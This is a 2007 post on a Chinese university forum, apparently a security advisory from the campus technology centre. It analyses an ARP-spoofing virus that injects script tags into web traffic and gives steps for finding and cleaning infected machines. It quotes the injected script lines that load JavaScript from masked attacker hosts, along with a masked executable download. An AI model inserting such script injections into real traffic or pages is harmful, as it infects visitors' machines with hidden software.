┢惠大论坛┪ » 动态校园 » 关于ARP病毒可以加载80端口任意网页木马的说明

huidabbs 发表于 2007-12-20 13:26

关于ARP病毒可以加载80端口任意网页木马的说明

[align=center] [/align]
[table=97%][tr][td][align=center][日期： 2007-12-20 ]  
[/align][/td][/tr][/table]    最近校园内一些用户发现打开一些网站不正常，出现布局错乱的显现，一些网络用户会[color=#ff0000]误认为[/color]中了病毒，或者服务器被黑。
    如果在你觉得不正常的网页里选-查看--源文件，就会发现页面被插入了一句例如： <script src=http://****.***.***/insert.js></script 的代码，说明不是服务器问题，是局域网ARP病毒。并且正在发作。
[b]特点[/b]
HTTP会话代码插入
----
http-insert # 表示进行HTTP会话插入操作
----
<script src=http://****.***.***/insert.js></script> # 要插入的字符串
"<script language=\"javascript\" src=\"http://f****t.8**0.org/ad.js\"></script>"等等。
[b]Packes.MakePE.a
威胁级别:★★☆☆☆
病毒类型:文件捆绑器
病毒长度:196608
影响系统:WinNT Win2000 WinXP Win2003[/b]
病毒行为:
    该病毒是一个具有ARP欺骗攻击的病毒。病毒运行后会复制自身至系统文件夹，然后释放病毒文件，生成注册表启动项以开机运行。病毒会向局域网80端口发送病毒数据，修改网页源码，下载大量隐蔽软件安装至用户计算机。
1.复制自身至
%sys32dir%\drivers\svchost.exe
释放
%sys32dir%\Packet.dll
%sys32dir%\WanPacket.dll
%sys32dir%\wpcap.dll
%sys32dir%\drivers\npf.sys
%sys32dir%\drivers\scvhost.exe
2.生成启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KVP "%sys32dir%\drivers\svchost.exe"
3.发送 ARP 欺骗扫描局域网，劫持
172.16
192.10
10.0
开头的IP段，向发送至80端口的数据包中插入
< script language=\"javascript\" src=\"http://xxx.xxx.xxx/ad.js\">
4.下载大量隐蔽软件安装至用户计算机
hxxp://xxx.xxx.xxx/xxx.exe
   
病毒运行后会复制自身至系统文件夹，然后释放病毒文件，生成注册表启动项以开机运行。病毒会向局域网80端口发送病毒数据，修改网页源码，下载大量隐蔽软件安装至用户计算机。  
发送 ARP 欺骗扫描局域网，劫持IP段，向发送至80端口的数据包中插入"<script language=\"javascript\" src=\"http://f****t.8**0.org/ad.js\"></script>"
分析病毒：利用MS0614漏洞、创建JS异步对象获取病毒（*.exe）文件，然后运行。
下面就说下关于杀毒的问题：
中了arp病毒必须要先找到中毒的机器
给这个机器断网、杀毒
恢复局域网
其中第一步最关键了，如何才能找到呢？
在局域网随便一台客户机上打开网上邻居，查看工作组计算机，然后等到列表刷新出来后，迅速点击开始-->运行-->cmd-->arp -a回车，如果机器比较多，请多输入几次arp -a，然后仔细查看，你会发现有一台机器的Mac地址和网关的Mac地址相同，恭喜你，这就是那个毒源！
杀毒！装杀毒软件或者进安全模式更甚者重装机器，总之把病毒杀掉就行了；
最后，到不能打开网页的机器上执行这个命令：点击开始-->运行-->cmd-->arp -d回车，然后就可以了。
请下载防篡改网页的2个漏洞补丁：

[url=http://news.hzu.edu.cn/upload/2007_12/07122012084104.rar][color=#0000ff]temp_07122012084104.rar[/color][/url]

[url=http://news.hzu.edu.cn/upload/2007_12/07122012091414.rar][color=#0000ff]temp_07122012091414.rar[/color][/url]
其他链接：
[url=http://netsecurity.51cto.com/art/200706/49210.htm][color=#0000ff]ARP病毒新变种导致浏览所有网站都带毒[/color][/url]
[url=http://news.xinhuanet.com/internet/2007-12/12/content_7235319.htm][color=#0000ff]ARP骗子校园行凶 钓鱼网站偷袭股民[/color][/url]
如有疑问，请咨询网络中心袁老师（办公电话：0752-2529230）
                                                                               教育技术中心
                                                                           2007年12月20日

查看完整版本: 关于ARP病毒可以加载80端口任意网页木马的说明